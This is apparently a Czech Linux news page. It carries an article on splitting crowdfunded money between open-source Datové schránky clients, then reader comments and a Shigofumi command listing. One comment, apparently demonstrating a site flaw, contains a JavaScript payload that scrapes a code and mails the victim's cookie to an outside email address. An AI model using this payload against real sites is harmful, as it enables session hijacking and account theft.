Kevin Lin zkouší využívat chytré brýle Mentra při hraní na piano. Vytváří aplikaci AugmentedChords, pomocí které si do brýlí posílá notový zápis (YouTube). Uvnitř brýlí běží AugmentOS (GitHub), tj. open source operační systém pro chytré brýle.
Jarní konference EurOpen.cz 2025 proběhne 26. až 28. května v Brandýse nad Labem. Věnována je programovacím jazykům, vývoji softwaru a programovacím technikám.
Na čem aktuálně pracují vývojáři GNOME a KDE Plasma? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE Plasma.
Před 25 lety zaplavil celý svět virus ILOVEYOU. Virus se šířil e-mailem, jenž nesl přílohu s názvem I Love You. Příjemci, zvědavému, kdo se do něj zamiloval, pak program spuštěný otevřením přílohy načetl z adresáře e-mailové adresy a na ně pak „milostný vzkaz“ poslal dál. Škody vznikaly jak zahlcením e-mailových serverů, tak i druhou činností viru, kterou bylo přemazání souborů uložených v napadeném počítači.
Byla vydána nová major verze 5.0.0 svobodného multiplatformního nástroje BleachBit (GitHub, Wikipedie) určeného především k efektivnímu čištění disku od nepotřebných souborů.
Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za duben (YouTube).
Provozovatel čínské sociální sítě TikTok dostal v Evropské unii pokutu 530 milionů eur (13,2 miliardy Kč) za nedostatky při ochraně osobních údajů. Ve svém oznámení to dnes uvedla irská Komise pro ochranu údajů (DPC), která jedná jménem EU. Zároveň TikToku nařídila, že pokud správu dat neuvede do šesti měsíců do souladu s požadavky, musí přestat posílat data o unijních uživatelích do Číny. TikTok uvedl, že se proti rozhodnutí odvolá.
Společnost JetBrains uvolnila Mellum, tj. svůj velký jazykový model (LLM) pro vývojáře, jako open source. Mellum podporuje programovací jazyky Java, Kotlin, Python, Go, PHP, C, C++, C#, JavaScript, TypeScript, CSS, HTML, Rust a Ruby.
Vývojáři Kali Linuxu upozorňují na nový klíč pro podepisování balíčků. K původnímu klíči ztratili přístup.
V březnu loňského roku přestal být Redis svobodný. Společnost Redis Labs jej přelicencovala z licence BSD na nesvobodné licence Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1). Hned o pár dní později vznikly svobodné forky Redisu s názvy Valkey a Redict. Dnes bylo oznámeno, že Redis je opět svobodný. S nejnovější verzí 8 je k dispozici také pod licencí AGPLv3.
Projekt si zpočátku kladl ambiciózní cíle. Ačkoliv se v rámci tohoto projektu nepodařilo všech vytyčených cílů dosáhnout, podařilo se zviditelnit nedostatky ne zcela ideální implementace samotných Datových schránek a nabídnout použitelné řešení pro ty z nás, kteří nemohou používat oficiální webové rozhraní pro přístup k Datovým schránkám. Zároveň jsme rádi, že mimo projektů probíhajících v rámci AbcLinuxu, se vynořila řada dalších dobrých implementací.
Protože aktivita kolem samotného projektu utichla a naopak rostl tlak na závěrečný verdikt, bylo nutné najít způsob, jakým peníze rozdělit mezi přihlášené projekty. Po posouzení jsme došli k závěru, že peníze budou rozděleny mezi projekty libisds (knihovna v C a frontend Šigofumi) a JAVA_ISDS (implementace v Javě), a to v poměru půl na půl. Uvědomujeme si, že žádný způsob rozdělení peněz není úplně fér ke všem stranám zároveň: tedy přihlášeným i nepřihlášeným projektům, projektům, které mezitím vznikly pod záštitou nejrůznějších firem a sdružení a v podstatě ani k lidem a firmám, které na vývoj přispěly.
Díky tedy patří i ostatním projektům jako dsgui (CZ.NIC, z.s.p.o.), OpenDS.cz (blue.point Solutions, s.r.o.), datové schránky pro Android (APK SOFT s.r.o.) a řadě dalších.
Výše příspěvků a celou historii bankovního účtu, kde byly v rukou Liberix, o.p.s. spravovány finance, lze vidět na transparentním kontě (přehled v PDF). Peníze tedy byly rozděleny následovně:
Před rokem jsme zveřejnili stav obou projektů. Požádali jsme oba projekty o dodatečné zhodnocení – jedno zhodnocení, které jsme dostali, je krátké (za JAVA_ISDS) a jedno je velmi dlouhé (za libisds). Bylo nám líto to dlouhé zkracovat, proto jej najdete v celém znění na druhé stránce tohoto článku. Cílem bylo čtenáře seznámit s tím, co se v projektu událo a jaký je jejich postoj k datovým schránkám.
Chtěli bychom poděkovat všem vývojářům, kteří umožnili uživatelům přistupovat k Datovým schránkám z libovolného operačního systému, což pro mnohé nepředstavuje jen „funkci navíc“, ale také v podstatě zákonnou nezbytnost. Dále chceme poděkovat sdružení Liberix, o.p.s. za důležitou spolupráci a pomoc v průběhu projektu. Děkujeme všem, kteří finančně přispěli, ale také těm, kteří nějakým způsobem pomohli při testování a rozvoji všech otevřených řešení. A na závěr přejeme těm, kterých se to týká, šťastnější ruku při volbě a implementaci technologií, které se přímo dotýkají občanů této země.
Nedávno jsem přidal přihlašování i přes certifikát. Vyřízení osobního certifikátu od Postsignum bylo docela vtipné, krátce po jeho vydání mi volali s prosbou, abych se tam stavil, protože mi zapomněli dát podepsat souhlas se zpracovanim osobnich udajů...
Připravuji se na přechod na nové testovací prostředí, které bude spuštěno v únoru.
O Datových schránkách nemám kladné mínění, ale některé změny jsem uvítal s radostí: přechod na BASIC autentizaci místo původního řešení s cookies a několikanásobným přesměrováním. Člověk se také naučí defenzivnímu programování, protože ví, že se nemůže na nic spoléhat.
Knihovna není zcela hotová. Seznam věcí, které bych rád jednou začlenil, je zapsán v souboru TODO.
Především se jedná o podporu souběžného zpracování z více vláken, možnost při překladu vypnout podporu síťových funkcí, schopnost validovat požadavky a odpovědi serveru proti XML schématu a to nejdůležitější – dopsat testy pro síťové operace.
Testováním síťových operací myslím testy funkcí jako přihlášení k datové schránce, získání seznamu zpráv, odeslání zprávy atd. V současnosti existuje testovací instance ISDS, kde je možné takové operace vyzkoušet, ale vše s patřičnou časovou prodlevou a především není možné otestovat reakci knihovny na všechny chybové stavy nebo na chybně utvořené zprávy (například hodnota času doručení by nebyla správně utvořena.).
Co tedy chybí, je nástroj, který by simuloval server, a sada testů, které by prověřily knihovnu po všech stránkách, především v okrajových případech, které se za běžného provozu nevyskytují. Protože takovou péči by si zasloužily i jiné knihovny (napsané v rozličných jazycích) a protože simulátor testů a definice testů mohou být na konkrétní knihovně nezávislé, došel jsem k závěru, že je třeba věc uchopit značně abstraktně a na jazyku knihovny nezávisle. Protože se jedná v podstatě o samostatný projekt rozsahem srovnatelný se samotnou knihovnou, rozhodl jsem se, že jej prostřednictvím firmy Red Hat Czech s. r. o. nabídnu jako zadání bakalářské práce. Pokud bude téma akademicky průchodné a až budou všechny formality hotové, studenti Fakulty informatiky Masarykovy univerzity a Fakulty informačních technologií Vysokého učení technického v Brně dostanou příležitost, jak skloubit příjemné s užitečným.
Nástroje: Tisk bez diskuse
Tiskni
Sdílej:
Koukám, že ty datové schránky nejsou zrovna bezpečné.Dobré ránko
Koukám, že ty datové schránky nejsou zrovna bezpečné.<uvítací melodie Windows XP>
Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.Jsou tam i horší věci.
debian-security
, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown
.
Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..
Celkem neúspěšně jsem zkoušel najít nějaká číslaPokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz
ale narazil jsem i na vtipnou kalkulačkuTo mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..9×108 Kč.
A proč z toho viním programátory ze Slušovic?Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože
Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".
xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224'); xmlhttp.send(''); var pole = xmlhttp.responseText.split(' '); var kod = ''; var part_num = 0; while (part_num < pole.length) { if (pole[part_num] == 'hodnotu') { kod = pole[part_num+1].substring(0,4); break; } part_num += 1; } xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish'); xmlhttp.send('');
This is Shigofumi, an ISDS client. Have a nice e-government. Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program